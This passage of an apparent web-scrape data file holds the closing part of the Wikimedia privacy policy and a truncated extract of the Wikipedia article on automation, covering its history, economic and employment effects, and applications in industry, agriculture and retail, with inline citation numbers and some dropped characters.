Sites with your mobile device, we may use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. We use this location information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. For example, we use this information to provide greater security, optimize mobile applications, and learn how to expand and better support Wikimedia communities. We also use Personal Information in the manner described in the sections of this Policy titled "For Legal Reasons" and "To Protect You, Ourselves Others. We use and share your Personal Information when you give us specific permission to do so, for legal reasons, and in the other circumstances described below. We share your Personal Information for a particular purpose, if you agree. For example, if you receive a scholarship and we ask permission to share your Personal Information with a local chapter. You can find more information in the list of examples in our FAQ. We will disclose your Personal Information to public authorities or other persons in response to an official legal process only if we believe it to be legally valid. See also our Requests for user information procedures and guidelines. We will notify you of such requests when possible. We do so to further our legitimate interest and or to comply with our legal obligations. We will access, use, preserve, and or disclose your Personal Information if we reasonably believe it necessary to satisfy a valid and legally enforceable warrant, subpoena, court order, law or regulation, or other judicial or administrative order. However, if we believe that a particular request for disclosure of a user's information is legally invalid or an abuse of the legal system and the affected user does not intend to oppose the disclosure themselves, we will try our best to fight it. We are committed to notifying you via email at least ten (10) calendar days, when possible, before we disclose your Personal Information in response to a legal demand. However, we may only provide notice if we are not legally restrained from contacting you, there is no credible threat to life or limb that is created or increased by disclosing the request, and you have provided us with an email address. Nothing in this Privacy Policy is intended to limit any legal objections or defenses you may have to a third-party's request (whether it be civil, criminal, or governmental) to disclose your Personal Information. We recommend seeking the advice of legal counsel immediately if such a request is made involving you. For more information, see our Subpoena FAQ. In the unlikely event that the ownership of the Foundation changes, we will provide you 30 days' notice before any Personal Information is transferred to the new owners or becomes subject to a different privacy policy. In the extremely unlikely event that ownership of all or substantially all of the Foundation changes, or we go through a reorganization (such as a merger, consolidation, or acquisition), consistent with our legitimate interest, we will continue to keep your Personal Information confidential, except as provided in this Policy, and provide notice to you via the Wikimedia Sites and a notification on WikimediaAnnounce-L or similar mailing list at least thirty (30) calendar days before any Personal Information is transferred or becomes subject to a different privacy policy. We, or users with certain administrative rights, use and disclose Personal Information that is reasonably necessary to: We do so to manage our relationship with you, to further our legitimate interest, and or to comply with our legal obligations. We, or particular users with certain administrative rights as described below, need to use and share your Personal Information if it is reasonably believed to be necessary to enforce or investigate potential violations of our Terms of Use, this Privacy Policy, or any Wikimedia Foundation or user community-based policies. We may also need to access and share Personal Information to investigate and defend ourselves against legal threats or actions. Wikimedia Sites are collaborative, with users writing most of the policies and selecting from amongst themselves people to hold certain administrative rights. These rights may include access to limited amounts of otherwise nonpublic information about recent contributions and activity by other users. They use this access to help protect against vandalism and abuse, fight harassment of other users, and generally try to minimize disruptive behavior on the Wikimedia Sites. These various user-selected administrative groups have their own privacy and confidentiality guidelines, but all such groups are supposed to agree to follow our Access to nonpublic personal data policy. These user-selected administrative groups are accountable to other users through checks and balances: users are selected through a community-driven process and overseen by their peers through a logged history of their actions. However, the legal names of these users are not known to the Wikimedia Foundation. We hope that this never comes up, but we may disclose your Personal Information if we believe that it is reasonably necessary to prevent imminent and serious bodily harm or death to a person, or to protect our organization, employees, contractors, users, or the public. We may also disclose your Personal Information if we reasonably believe it necessary to detect, prevent, or otherwise assess and address potential spam, malware, fraud, abuse, unlawful activity, and security or technical concerns. (Check out the list of examples in our FAQ for more information.) We disclose Personal Information to our third-party service providers or contractors to help run or improve the Wikimedia Sites and provide services in support of our mission. We use third-party service providers or contractors to help run or improve the Wikimedia Sites for you and other users. We give access to your Personal Information to these providers or contractors as needed to perform their services for us or to use their tools and services. We put requirements, such as confidentiality agreements, in place to help ensure that these service providers treat your Personal Information consistently with, and no less protective of your privacy than, the principles of this Policy. For further information, please see our FAQ. If you are visiting Wikimedia Sites with your mobile device, we use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. Some of our service providers ask us to post links to their privacy policies; a list of these service providers and links to their policies can be found on this page. The open-source software that powers the Wikimedia Sites depends on the contributions of volunteer software developers, who spend time writing and testing code to help it improve and evolve with our users' needs. To facilitate their work, we give some developers limited access to systems that contain your Personal Information, but only as reasonably necessary for them to develop and contribute to the Wikimedia Sites. Similarly, we share non-Personal Information or aggregated information with researchers, scholars, academics, and other interested third parties who wish to study the Wikimedia Sites. Sharing this Personal Information helps them understand usage, viewing, and demographics statistics and patterns. They then can share their findings with us and our users so that we can all better understand and improve the Wikimedia Sites. When we give access to Personal Information to third-party developers or researchers, we put requirements, such as reasonable technical and contractual protections, in place to help ensure that these service providers treat your Personal Information consistently with the principles of this Policy and in accordance with our instructions. If these developers or researchers later publish their work or findings, we ask that they not disclose your Personal Information. Please note that, despite the obligations we impose on developers and researchers, we cannot guarantee that they will abide by our agreement, nor do we guarantee that we will regularly screen or audit their projects. (You can learn more about re-identification in our FAQ.) Information that you post is public and can be seen and used by everyone. Any information you post publicly on the Wikimedia Sites is just that public. For example, if you put your mailing address on your talk page, that is public, and not specifically protected by this Policy. And if you edit without registering or logging into your account, your IP address will be seen publicly. Please think carefully about your desired level of privacy before you disclose Personal Information on your user page or elsewhere. We use a variety of physical and technical measures, policies, and procedures to help protect your Personal Information from unauthorized access, use, or disclosure. We strive to protect your Personal Information from unauthorized access, use, or disclosure. We use a variety of physical and technical measures, policies, and procedures (such as access control procedures, network firewalls, and physical security) designed to protect our systems and your Personal Information. Unfortunately, there is no such thing as completely secure data transmission or storage, so we cannot guarantee that our security will not be breached (by technical measures or through violation of our policies and procedures). We will never ask for your password by email (but may send you a temporary password via email if you have requested a password reset). If you ever receive an email that requests your password, please let us know by sending it to privacy wikimedia.org, so we can investigate the source of the email. Except as otherwise stated in this Policy, we only keep your Personal Information as long as necessary to maintain, understand and improve the Wikimedia Sites or to comply with applicable law. Once we receive Personal Information from you, we keep it for the shortest possible time that is consistent with the maintenance, understanding, and improvement of the Wikimedia Sites, and our obligations under applicable law. In most instances, Personal Information is deleted, aggregated or de-identified after 90 days. Non-Personal Information may be retained indefinitely as appropriate. (Check out the list of examples in our FAQ.) Please remember that when you make a contribution to any Wikimedia Site, the page history will show when your contribution was made, your username (if you are signed in), or your IP address (if you edit while not logged in). The transparency of the projects' contribution and revision histories is critical to their efficacy and trustworthiness. To learn more about our data retention practices, see our data retention guidelines. If you would like to request access to or removal of your Personal Information, you may contact us. For information about how you may request removal of your Personal Information, or other rights you may have with respect to your Personal Information, see our FAQ. If you would like to request to access, update or restrict object to the processing of Personal Information, or receive a copy of your Personal Information for purposes of transmitting it to another organization, you may Contact Us. We will respond to your request consistent with applicable law. Please note also that you may be able to exercise some of these rights without our intervention. For example, if you are a registered user, you can access and update some Personal Information in your Preferences, as well as download your user account data. You may also manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences. For the protection of the Wikimedia Foundation and other users, if you do not agree with this Privacy Policy, you may not use the Wikimedia Sites. The Wikimedia Foundation is a non-profit organization based in San Francisco, California, with servers and data centers located in the U.S. If you decide to use Wikimedia Sites, whether from inside or outside of the U.S., you understand that your Personal Information will be collected, transferred, stored, processed, disclosed and otherwise used in the U.S. as described in this Privacy Policy. You also understand that your information may be transferred by us from the U.S. to other countries, which may have different or less stringent data protection laws than your country, in connection with providing services to you. We are strongly committed to protecting users' Personal Information. Under this Policy, we may share your information only under particular situations, which you can learn more about in the "When May We Share Your Information" section of this Privacy Policy. In particular, we do not share your Personal Information for marketing purposes. Because we protect all users in accordance with this Privacy Policy, we do not change our behavior in response to a web browser's "do not track" signal. For more information regarding Do Not Track signals and how we handle them, please visit our FAQ. Substantial changes to this Policy will not be made until after a public comment period of at least 30 days. Because things naturally change over time and we want to ensure our Privacy Policy accurately reflects our practices and the law, it may be necessary to modify this Privacy Policy from time to time. We reserve the right to do so in the following manner: We ask that you please review the most up-to-date version of our Privacy Policy. Your continued use of the Wikimedia Sites after any effective date of a subsequent version of this Privacy Policy constitutes acceptance of this Privacy Policy on your part. If you have questions or suggestions about this Privacy Policy, or the information collected under this Privacy Policy, please email us at privacy wikimedia.org or contact us directly. If you are located in the European Economic Area and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at EUrepresentative.Wikimedia twobirds.com, or via mail at: If you are an individual located in the United Kingdom, and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at UKrepresentative.Wikimedia twobirds.com, or via mail at: Our European Economic Area and United Kingdom Representative can only be contacted for queries in relation to data protection. Depending on your jurisdiction, you also may have the right to lodge a complaint with a supervisory authority competent for your country or region. Thank you for reading our Privacy Policy. We hope you enjoy using the Wikimedia Sites and appreciate your participation in creating, maintaining, and constantly working to improve the largest repository of free knowledge in the world. Please note that in the event of any differences in meaning or interpretation between the original English version of this Privacy Policy and a translation, the original English version takes precedence. This version was approved by Amanda Keton on June 7, 2021, pursuant to the Delegation of policy-making authority by the Board, and went into effect on June 25, 2021. Previous versions can be found below: |
636 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Automation | Automation describes a wide range of technologies that reduce human intervention in processes, mainly by predetermining decision criteria, subprocess relationships, and related actions, as well as embodying those predeterminations in machines. 1 2 Automation has been achieved by various means including mechanical, hydraulic, pneumatic, electrical, electronic devices, and computers, usually in combination. Complicated systems, such as modern factories, airplanes, and ships typically use combinations of all of these techniques. The benefit of automation includes labor savings, reducing waste, savings in electricity costs, savings in material costs, and improvements to quality, accuracy, and precision. Automation includes the use of various equipment and control systems such as machinery, processes in factories, boilers, 3 and heat-treating ovens, switching on telephone networks, steering, stabilization of ships, aircraft and other applications and vehicles with reduced human intervention. 4 Examples range from a household thermostat controlling a boiler to a large industrial control system with tens of thousands of input measurements and output control signals. Automation has also found a home in the banking industry. It can range from simple on-off control to multi-variable high-level algorithms in terms of control complexity. In the simplest type of an automatic control loop, a controller compares a measured value of a process with a desired set value and processes the resulting error signal to change some input to the process, in such a way that the process stays at its set point despite disturbances. This closed-loop control is an application of negative feedback to a system. The mathematical basis of control theory was begun in the 18th century and advanced rapidly in the 20th. The term automation, inspired by the earlier word automatic (coming from automaton), was not widely used before 1947, when Ford established an automation department. 5 It was during this time that the industry was rapidly adopting feedback controllers, which were introduced in the 1930s. 6 The World Bank's World Development Report of 2019 shows evidence that the new industries and jobs in the technology sector outweigh the economic effects of workers being displaced by automation. 7 Job losses and downward mobility blamed on automation have been cited as one of many factors in the resurgence of nationalist, protectionist and populist politics in the US, UK and France, among other countries since the 2010s. 8 9 10 11 12 It was a preoccupation of the Greeks and Arabs (in the period between about 300 BC and about 1200 AD) to keep accurate track of time. In Ptolemaic Egypt, about 270 BC, Ctesibius described a float regulator for a water clock, a device not unlike the ball and cock in a modern flush toilet. This was the earliest feedback-controlled mechanism. 13 The appearance of the mechanical clock in the 14th century made the water clock and its feedback control system obsolete. The Persian Ban M s brothers, in their Book of Ingenious Devices (850 AD), described a number of automatic controls. 14 Two-step level controls for fluids, a form of discontinuous variable structure controls, were developed by the Banu Musa brothers. 15 They also described a feedback controller. 16 17 The design of feedback control systems up through the Industrial Revolution was by trial-and-error, together with a great deal of engineering intuition. It was not until the mid 19th century that the stability of feedback control systems was analyzed using mathematics, the formal language of automatic control theory. citation needed The centrifugal governor was invented by Christiaan Huygens in the seventeenth century, and used to adjust the gap between millstones. 18 19 20 The introduction of prime movers, or self-driven machines advanced grain mills, furnaces, boilers, and the steam engine created a new requirement for automatic control systems including temperature regulators (invented in 1624; see Cornelius Drebbel), pressure regulators (1681), float regulators (1700) and speed control devices. Another control mechanism was used to tent the sails of windmills. It was patented by Edmund Lee in 1745. 21 Also in 1745, Jacques de Vaucanson invented the first automated loom. Around 1800, Joseph Marie Jacquard created a punch-card system to program looms. 22 In 1771 Richard Arkwright invented the first fully automated spinning mill driven by water power, known at the time as the water frame. 23 An automatic flour mill was developed by Oliver Evans in 1785, making it the first completely automated industrial process. 24 25 A centrifugal governor was used by Mr. Bunce of England in 1784 as part of a model steam crane. 26 27 The centrifugal governor was adopted by James Watt for use on a steam engine in 1788 after Watt's partner Boulton saw one at a flour mill Boulton Watt were building. 21 The governor could not actually hold a set speed; the engine would assume a new constant speed in response to load changes. The governor was able to handle smaller variations such as those caused by fluctuating heat load to the boiler. Also, there was a tendency for oscillation whenever there was a speed change. As a consequence, engines equipped with this governor were not suitable for operations requiring constant speed, such as cotton spinning. 21 Several improvements to the governor, plus improvements to valve cut-off timing on the steam engine, made the engine suitable for most industrial uses before the end of the 19th century. Advances in the steam engine stayed well ahead of science, both thermodynamics and control theory. 21 The governor received relatively little scientific attention until James Clerk Maxwell published a paper that established the beginning of a theoretical basis for understanding control theory. Relay logic was introduced with factory electrification, which underwent rapid adaption from 1900 through the 1920s. Central electric power stations were also undergoing rapid growth and the operation of new high-pressure boilers, steam turbines and electrical substations created a large demand for instruments and controls. Central control rooms became common in the 1920s, but as late as the early 1930s, most process controls were on-off. Operators typically monitored charts drawn by recorders that plotted data from instruments. To make corrections, operators manually opened or closed valves or turned switches on or off. Control rooms also used color-coded lights to send signals to workers in the plant to manually make certain changes. 28 The development of the electronic amplifier during the 1920s, which was important for long-distance telephony, required a higher signal-to-noise ratio, which was solved by negative feedback noise cancellation. This and other telephony applications contributed to the control theory. In the 1940s and 1950s, German mathematician Irmgard Fl gge-Lotz developed the theory of discontinuous automatic controls, which found military applications during the Second World War to fire control systems and aircraft navigation systems. 6 Controllers, which were able to make calculated changes in response to deviations from a set point rather than on-off control, began being introduced in the 1930s. Controllers allowed manufacturing to continue showing productivity gains to offset the declining influence of factory electrification. 29 Factory productivity was greatly increased by electrification in the 1920s. U.S. manufacturing productivity growth fell from 5.2% yr 1919 29 to 2.76% yr 1929 41. Alexander Field notes that spending on non-medical instruments increased significantly from 1929 to 1933 and remained strong thereafter. 29 The First and Second World Wars saw major advancements in the field of mass communication and signal processing. Other key advances in automatic controls include differential equations, stability theory and system theory (1938), frequency domain analysis (1940), ship control (1950), and stochastic analysis (1941). Starting in 1958, various systems based on solid-state 30 31 digital logic modules for hard-wired programmed logic controllers (the predecessors of programmable logic controllers PLC ) emerged to replace electro-mechanical relay logic in industrial control systems for process control and automation, including early Telefunken AEG Logistat, Siemens Simatic, Philips Mullard Valvo de Norbit, BBC Sigmatronic, ACEC Logacec, Akkord de Estacord, Krone Mibakron, Bistat, Datapac, Norlog, SSR, or Procontic systems. 30 32 33 34 35 36 In 1959 Texaco's Port Arthur Refinery became the first chemical plant to use digital control. 37 Conversion of factories to digital control began to spread rapidly in the 1970s as the price of computer hardware fell. The automatic telephone switchboard was introduced in 1892 along with dial telephones. By 1929, 31.9% of the Bell system was automatic. 38 : 158 Automatic telephone switching originally used vacuum tube amplifiers and electro-mechanical switches, which consumed a large amount of electricity. Call volume eventually grew so fast that it was feared the telephone system would consume all electricity production, prompting Bell Labs to begin research on the transistor. 39 The logic performed by telephone switching relays was the inspiration for the digital computer. The first commercially successful glass bottle-blowing machine was an automatic model introduced in 1905. 40 The machine, operated by a two-man crew working 12 hour shifts, could produce 17,280 bottles in 24 hours, compared to 2,880 bottles made by a crew of six men and boys working in a shop for a day. The cost of making bottles by machine was 10 to 12 cents per gross compared to $1.80 per gross by the manual glassblowers and helpers. Sectional electric drives were developed using control theory. Sectional electric drives are used on different sections of a machine where a precise differential must be maintained between the sections. In steel rolling, the metal elongates as it passes through pairs of rollers, which must run at successively faster speeds. In paper making paper, the sheet shrinks as it passes around steam-heated drying arranged in groups, which must run at successively slower speeds. The first application of a sectional electric drive was on a paper machine in 1919. 41 One of the most important developments in the steel industry during the 20th century was continuous wide strip rolling, developed by Armco in 1928. 42 Before automation, many chemicals were made in batches. In 1930, with the widespread use of instruments and the emerging use of controllers, the founder of Dow Chemical Co. was advocating continuous production. 43 Self-acting machine tools that displaced hand dexterity so they could be operated by boys and unskilled laborers were developed by James Nasmyth in the 1840s. 44 Machine tools were automated with Numerical control (NC) using punched paper tape in the 1950s. This soon evolved into computerized numerical control (CNC). Today extensive automation is practiced in practically every type of manufacturing and assembly process. Some of the larger processes include electrical power generation, oil refining, chemicals, steel mills, plastics, cement plants, fertilizer plants, pulp and paper mills, automobile and truck assembly, aircraft production, glass manufacturing, natural gas separation plants, food and beverage processing, canning and bottling and manufacture of various kinds of parts. Robots are especially useful in hazardous applications like automobile spray painting. Robots are also used to assemble electronic circuit boards. Automotive welding is done with robots and automatic welders are used in applications like pipelines. With the advent of the space age in 1957, controls design, particularly in the United States, turned away from the frequency-domain techniques of classical control theory and backed into the differential equation techniques of the late 19th century, which were couched in the time domain. During the 1940s and 1950s, German mathematician Irmgard Flugge-Lotz developed the theory of discontinuous automatic control, which became widely used in hysteresis control systems such as navigation systems, fire-control systems, and electronics. Through Flugge-Lotz and others, the modern era saw time-domain design for nonlinear systems (1961), navigation (1960), optimal control and estimation theory (1962), nonlinear control theory (1969), digital control and filtering theory (1974), and the personal computer (1983). Perhaps the most cited advantage of automation in industry is that it is associated with faster production and cheaper labor costs. Another benefit could be that it replaces hard, physical, or monotonous work. 45 Additionally, tasks that take place in hazardous environments or that are otherwise beyond human capabilities can be done by machines, as machines can operate even under extreme temperatures or in atmospheres that are radioactive or toxic. They can also be maintained with simple quality checks. However, at the time being, not all tasks can be automated, and some tasks are more expensive to automate than others. Initial costs of installing the machinery in factory settings are high, and failure to maintain a system could result in the loss of the product itself. Moreover, some studies seem to indicate that industrial automation could impose ill effects beyond operational concerns, including worker displacement due to systemic loss of employment and compounded environmental damage; however, these findings are both convoluted and controversial in nature, and could potentially be circumvented. 46 The main advantages of automation are: Automation primarily describes machines replacing human action, but it is also loosely associated with mechanization, machines replacing human labor. Coupled with mechanization, extending human capabilities in terms of size, strength, speed, endurance, visual range acuity, hearing frequency precision, electromagnetic sensing effecting, etc., advantages include: 48 The main disadvantages of automation are: The paradox of automation says that the more efficient the automated system, the more crucial the human contribution of the operators. Humans are less involved, but their involvement becomes more critical. Lisanne Bainbridge, a cognitive psychologist, identified these issues notably in her widely cited paper "Ironies of Automation. 49 If an automated system has an error, it will multiply that error until it is fixed or shut down. This is where human operators come in. 50 A fatal example of this was Air France Flight 447, where a failure of automation put the pilots into a manual situation they were not prepared for. 51 Many roles for humans in industrial processes presently lie beyond the scope of automation. Human-level pattern recognition, language comprehension, and language production ability are well beyond the capabilities of modern mechanical and computer systems (but see Watson computer). Tasks requiring subjective assessment or synthesis of complex sensory data, such as scents and sounds, as well as high-level tasks such as strategic planning, currently require human expertise. In many cases, the use of humans is more cost-effective than mechanical approaches even where the automation of industrial tasks is possible. Therefore, algorithmic management as the digital rationalization of human labor instead of its substitution has emerged as an alternative technological strategy. 53 Overcoming these obstacles is a theorized path to post-scarcity economics. 54 Increased automation often causes workers to feel anxious about losing their jobs as technology renders their skills or experience unnecessary. Early in the Industrial Revolution, when inventions like the steam engine were making some job categories expendable, workers forcefully resisted these changes. Luddites, for instance, were English textile workers who protested the introduction of weaving machines by destroying them. 55 More recently, some residents of Chandler, Arizona, have slashed tires and pelted rocks at self-driving car, in protest over the cars' perceived threat to human safety and job prospects. 56 The relative anxiety about automation reflected in opinion polls seems to correlate closely with the strength of organized labor in that region or nation. For example, while a study by the Pew Research Center indicated that 72% of Americans are worried about increasing automation in the workplace, 80% of Swedes see automation and artificial intelligence (AI) as a good thing, due to the country's still-powerful unions and a more robust national safety net. 57 In the U.S., 47% of all current jobs have the potential to be fully automated by 2033, according to the research of experts Carl Benedikt Frey and Michael Osborne. Furthermore, wages and educational attainment appear to be strongly negatively correlated with an occupation's risk of being automated. 58 Even highly skilled professional jobs like a lawyer, doctor, engineer, journalist are at risk of automation. 59 Prospects are particularly bleak for occupations that do not presently require a university degree, such as truck driving. 60 Even in high-tech corridors like Silicon Valley, concern is spreading about a future in which a sizable percentage of adults have little chance of sustaining gainful employment. 61 "In The Second Machine Age, Erik Brynjolfsson and Andrew McAfee argue that ...there's never been a better time to be a worker with special skills or the right education, because these people can use technology to create and capture value. However, there's never been a worse time to be a worker with only 'ordinary' skills and abilities to offer, because computers, robots, and other digital technologies are acquiring these skills and abilities at an extraordinary rate. 62 As the example of Sweden suggests, however, the transition to a more automated future need not inspire panic, if there is sufficient political will to promote the retraining of workers whose positions are being rendered obsolete. According to a 2020 study in the Journal of Political Economy, automation has robust negative effects on employment and wages: "One more robot per thousand workers reduces the employment-to-population ratio by 0.2 percentage points and wages by 0.42%. 63 Research by Carl Benedikt Frey and Michael Osborne of the Oxford Martin School argued that employees engaged in "tasks following well-defined procedures that can easily be performed by sophisticated algorithms" are at risk of displacement, and 47% of jobs in the US were at risk. The study, released as a working paper in 2013 and published in 2017, predicted that automation would put low-paid physical occupations most at risk, by surveying a group of colleagues on their opinions. 64 However, according to a study published in McKinsey Quarterly 65 in 2015 the impact of computerization in most cases is not the replacement of employees but the automation of portions of the tasks they perform. 66 The methodology of the McKinsey study has been heavily criticized for being intransparent and relying on subjective assessments. 67 The methodology of Frey and Osborne has been subjected to criticism, as lacking evidence, historical awareness, or credible methodology. 68 69 Additionally, the Organisation for Economic Co-operation and Development (OECD) found that across the 21 OECD countries, 9% of jobs are automatable. 70 The Obama administration pointed out that every 3 months "about 6 percent of jobs in the economy are destroyed by shrinking or closing businesses, while a slightly larger percentage of jobs are added. 71 A recent MIT economics study of automation in the U.S. from 1990 to 2007 found that there may be a negative impact on employment and wages when robots are introduced to an industry. When one robot is added per one thousand workers, the employment to population ratio decreases between 0.18 and 0.34 percentages and wages are reduced by 0.25 0.5 percentage points. During the time period studied, the US did not have many robots in the economy which restricts the impact of automation. However, automation is expected to triple (conservative estimate) or quadruple (a generous estimate) leading these numbers to become substantially higher. 72 Based on a formula by Gilles Saint-Paul, an economist at Toulouse 1 University, the demand for unskilled human capital declines at a slower rate than the demand for skilled human capital increases. 73 In the long run and for society as a whole it has led to cheaper products, lower average work hours, and new industries forming (i.e., robotics industries, computer industries, design industries). These new industries provide many high salary skill-based jobs to the economy. By 2030, between 3 and 14 percent of the global workforce will be forced to switch job categories due to automation eliminating jobs in an entire sector. While the number of jobs lost to automation is often offset by jobs gained from technological advances, the same type of job loss is not the same one replaced and that leading to increasing unemployment in the lower-middle class. This occurs largely in the US and developed countries where technological advances contribute to higher demand for highly skilled labor but demand for middle-wage labor continues to fall. Economists call this trend "income polarization" where unskilled labor wages are driven down and skilled labor is driven up and it is predicted to continue in developed economies. 74 Unemployment is becoming a problem in the U.S. due to the exponential growth rate of automation and technology. According to Kim, Kim, and Lee (2017:1), a seminal study by Frey and Osborne in 2013 predicted that 47% of the 702 examined occupations in the U.S. faced a high risk of decreased employment rate within the next 10 25 years as a result of computerization. As many jobs are becoming obsolete, which is causing job displacement, one possible solution would be for the government to assist with a universal basic income (UBI) program. UBI would be a guaranteed, non-taxed income of around 1000 dollars per month, paid to all U.S. citizens over the age of 21. UBI would help those who are displaced take on jobs that pay less money and still afford to get by. It would also give those that are employed with jobs that are likely to be replaced by automation and technology extra money to spend on education and training on new demanding employment skills. UBI, however, should be seen as a short-term solution as it doesn't fully address the issue of income inequality which will be exacerbated by job displacement. Lights-out manufacturing is a production system with no human workers, to eliminate labor costs. Lights out manufacturing grew in popularity in the U.S. when General Motors in 1982 implemented humans "hands-off" manufacturing to "replace risk-averse bureaucracy with automation and robots". However, the factory never reached full "lights out" status. 75 The expansion of lights out manufacturing requires: 76 The costs of automation to the environment are different depending on the technology, product or engine automated. There are automated engines that consume more energy resources from the Earth in comparison with previous engines and vice versa. citation needed Hazardous operations, such as oil refining, the manufacturing of industrial chemicals, and all forms of metal working, were always early contenders for automation. dubious discuss citation needed The automation of vehicles could prove to have a substantial impact on the environment, although the nature of this impact could be beneficial or harmful depending on several factors. Because automated vehicles are much less likely to get into accidents compared to human-driven vehicles, some precautions built into current models (such as anti-lock brakes or laminated glass) would not be required for self-driving versions. Removal of these safety features reduces the weight of the vehicle, and coupled with more precise acceleration and braking, as well as fuel-efficient route mapping, can increase fuel economy and reduce emissions. Despite this, some researchers theorize that an increase in the production of self-driving cars could lead to a boom in vehicle ownership and usage, which could potentially negate any environmental benefits of self-driving cars if they are used more frequently. 77 Automation of homes and home appliances is also thought to impact the environment. A study of energy consumption of automated homes in Finland showed that smart homes could reduce energy consumption by monitoring levels of consumption in different areas of the home and adjusting consumption to reduce energy leaks (e.g. automatically reducing consumption during the nighttime when activity is low). This study, along with others, indicated that the smart home's ability to monitor and adjust consumption levels would reduce unnecessary energy usage. However, some research suggests that smart homes might not be as efficient as non-automated homes. A more recent study has indicated that, while monitoring and adjusting consumption levels do decrease unnecessary energy use, this process requires monitoring systems that also consume an amount of energy. The energy required to run these systems sometimes negates their benefits, resulting in little to no ecological benefit. 78 Another major shift in automation is the increased demand for flexibility and convertibility in manufacturing processes. Manufacturers are increasingly demanding the ability to easily switch from manufacturing Product A to manufacturing Product B without having to completely rebuild the production lines. Flexibility and distributed processes have led to the introduction of Automated Guided Vehicles with Natural Features Navigation. Digital electronics helped too. Former analog-based instrumentation was replaced by digital equivalents which can be more accurate and flexible, and offer greater scope for more sophisticated configuration, parametrization, and operation. This was accompanied by the fieldbus revolution which provided a networked (i.e. a single cable) means of communicating between control systems and field-level instrumentation, eliminating hard-wiring. Discrete manufacturing plants adopted these technologies fast. The more conservative process industries with their longer plant life cycles have been slower to adopt and analog-based measurement and control still dominate. The growing use of Industrial Ethernet on the factory floor is pushing these trends still further, enabling manufacturing plants to be integrated more tightly within the enterprise, via the internet if necessary. Global competition has also increased demand for Reconfigurable Manufacturing Systems. 79 Engineers can now have numerical control over automated devices. The result has been a rapidly expanding range of applications and human activities. Computer-aided technologies (or CAx) now serve as the basis for mathematical and organizational tools used to create complex systems. Notable examples of CAx include computer-aided design (CAD software) and computer-aided manufacturing (CAM software). The improved design, analysis, and manufacture of products enabled by CAx has been beneficial for industry. 80 Information technology, together with industrial machinery and processes, can assist in the design, implementation, and monitoring of control systems. One example of an industrial control system is a programmable logic controller (PLC). PLCs are specialized hardened computers which are frequently used to synchronize the flow of inputs from (physical) sensors and events with the flow of outputs to actuators and events. 81 Human-machine interfaces (HMI) or computer human interfaces (CHI), formerly known as man-machine interfaces, are usually employed to communicate with PLCs and other computers. Service personnel who monitor and control through HMIs can be called by different names. In the industrial process and manufacturing environments, they are called operators or something similar. In boiler houses and central utility departments, they are called stationary engineers. 82 Different types of automation tools exist: Host simulation software (HSS) is a commonly used testing tool that is used to test the equipment software. HSS is used to test equipment performance concerning factory automation standards (timeouts, response time, processing time). 83 Cognitive automation, as a subset of AI, is an emerging genus of automation enabled by cognitive computing. Its primary concern is the automation of clerical tasks and workflows that consist of structuring unstructured data. citation needed Cognitive automation relies on multiple disciplines: natural language processing, real-time computing, machine learning algorithms, big data analytics, and evidence-based learning. 84 According to Deloitte, cognitive automation enables the replication of human tasks and judgment "at rapid speeds and considerable scale. 85 Such tasks include: Artificially intelligent computer-aided design (CAD) can use text-to 3D, image-to 3D, and video-to 3D to automate in 3D modeling. 86 Ai CAD libraries could also be developed using linked open data of schematics and diagrams. 87 Ai CAD assistants are used as tools to help streamline workflow. 88 Technologies like solar panels, wind turbines, and other renewable energy sources—together with smart grids, micro-grids, battery storage—can automate power production. Many agricultural operations are automated with machinery and equipment to improve their diagnosis, decision-making and or performing. Agricultural automation can relieve the drudgery of agricultural work, improve the timeliness and precision of agricultural operations, raise productivity and resource-use efficiency, build resilience, and improve food quality and safety. 89 Increased productivity can free up labour, allowing agricultural households to spend more time elsewhere. 90 The technological evolution in agriculture has resulted in progressive shifts to digital equipment and robotics. 89 Motorized mechanization using engine power automates the performance of agricultural operations such as ploughing and milking. 91 With digital automation technologies, it also becomes possible to automate diagnosis and decision-making of agricultural operations. 89 For example, autonomous crop robots can harvest and seed crops, while drones can gather information to help automate input application. 90 Precision agriculture often employs such automation technologies 90 Motorized mechanization has generally increased in recent years. 92 Sub-Saharan Africa is the only region where the adoption of motorized mechanization has stalled over the past decades. 93 90 Automation technologies are increasingly used for managing livestock, though evidence on adoption is lacking. Global automatic milking system sales have increased over recent years, 94 but adoption is likely mostly in Northern Europe, 95 and likely almost absent in low- and middle-income countries. 96 90 Automated feeding machines for both cows and poultry also exist, but data and evidence regarding their adoption trends and drivers is likewise scarce. 90 92 Many supermarkets and even smaller stores are rapidly introducing self-checkout systems reducing the need for employing checkout workers. In the U.S., the retail industry employs 15.9 million people as of 2017 (around 1 in 9 Americans in the workforce). Globally, an estimated 192 million workers could be affected by automation according to research by Eurasia Group. 97 Online shopping could be considered a form of automated retail as the payment and checkout are through an automated online transaction processing system, with the share of online retail accounting jumping from 5.1% in 2011 to 8.3% in 2016. citation needed However, two-thirds of books, music, and films are now purchased online. In addition, automation and online shopping could reduce demands for shopping malls, and retail property, which in the United States is currently estimated to account for 31% of all commercial property or around 7 billion square feet (650 million square metres). Amazon has gained much of the growth in recent years for online shopping, accounting for half of the growth in online retail in 2016. 97 Other forms of automation can also be an integral part of online shopping, for example, the deployment of automated warehouse robotics such as that applied by Amazon using Kiva Systems. The food retail industry has started to apply automation to the ordering process; McDonald's has introduced touch screen ordering and payment systems in many of its restaurants, reducing the need for as many cashier employees. 98 The University of Texas at Austin has introduced fully automated cafe retail locations. 99 Some Cafes and restaurants have utilized mobile and tablet "apps" to make the ordering process more efficient by customers ordering and paying on their device. 100 Some restaurants have automated food delivery to tables of customers using a Conveyor belt system. The use of robots is sometimes employed to replace waiting staff. 101 Automation in construction is the combination of methods, processes, and systems that allow for greater machine autonomy in construction activities. Construction automation may have multiple goals, including but not limited to, reducing jobsite injuries, decreasing activity completion times, and assisting with quality control and quality assurance. 102 Automated mining involves the removal of human labor from the mining process. 103 The mining industry is currently in the transition towards automation. Currently, it can still require a large amount of human capital, particularly in the third world where labor costs are low so there is less incentive for increasing efficiency through automation. The Defense Advanced Research Projects Agency (DARPA) started the research and development of automated visual surveillance and monitoring (VSAM) program, between 1997 and 1999, and airborne video surveillance (AVS) programs, from 1998 to 